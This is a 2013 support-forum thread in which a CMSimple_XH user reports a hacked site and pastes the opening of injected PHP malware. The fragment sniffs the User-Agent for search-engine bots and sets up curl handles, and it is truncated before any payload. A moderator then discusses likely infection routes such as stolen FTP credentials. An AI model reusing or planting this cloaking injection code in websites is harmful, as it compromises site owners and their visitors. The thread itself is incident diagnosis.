CMsimple xh 1.56 - hacked

A place for security related announcements and discussions - please check this forum frequently!
Post Reply
Rkay77
Posts: 16
Joined: Tue Mar 26, 2013 3:27 pm

CMsimple xh 1.56 - hacked

Post by Rkay77 » Fri Apr 19, 2013 12:07 pm

Hi all, today my clients site which was updated to 1.56 recently suffered the google bot hack attack. I thought the latest version of CMS ensured this wasn't possible? The attack targeted my root index.php and plugins folder index.php
I have 3 folders on the clients host one for each of the following.
Cmsimple3_3
Cmsimplexh 1.53
Cmsimplexh 1.56
all three folders were attacked the same way.

Just so I'm clear, does this php attack require FTP access?

Code: Select all

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
.
.
.
etc
etc
etc

cmb
Posts: 12314
Joined: Tue Jun 21, 2011 11:04 am
Location: Mü-Sa, RLP, DE
Contact:

Re: CMsimple xh 1.56 - hacked

Post by cmb » Fri Apr 19, 2013 12:34 pm

According to http://danuxx.blogspot.de/2012/04/disse ... lware.html:
The method of infection is out of the scope of this blog but can be by exploiting a remote execution vulnerability (LFI) in the web site, or by stealing account credentials, etc.
I'm not aware of a remote execution vulnerability in either CMSimple 3.3, CMSimple_XH 1.5.3 or 1.5.6. However, there have been such vulnerabilites in the Register plugin and in TemPlug templates; both are fixed in recent versions. A third possibility which is not mentioned in danuxx' blog, would be a CSRF attack, which might have been inserted malicious code in the template (so check template.htm); but I consider this somewhat unlikely, as the CSRF attack would have to be made against this very site.

So this most likely happened due to a trojan on a client PC, which obtained the FTP account settings. The same code injection was reported in a German thread.

PS: see http://cmsimpleforum.com/viewtopic.php? ... 788#p34789. ISTM that you have a trojan on your local machine (maybe your ZIP program is infected?).
Last edited by cmb on Fri Apr 19, 2013 12:42 pm, edited 1 time in total.
Reason: added PS
Christoph M. Becker –Plugins for CMSimple_XH, but not for CMSimple 4+

Post Reply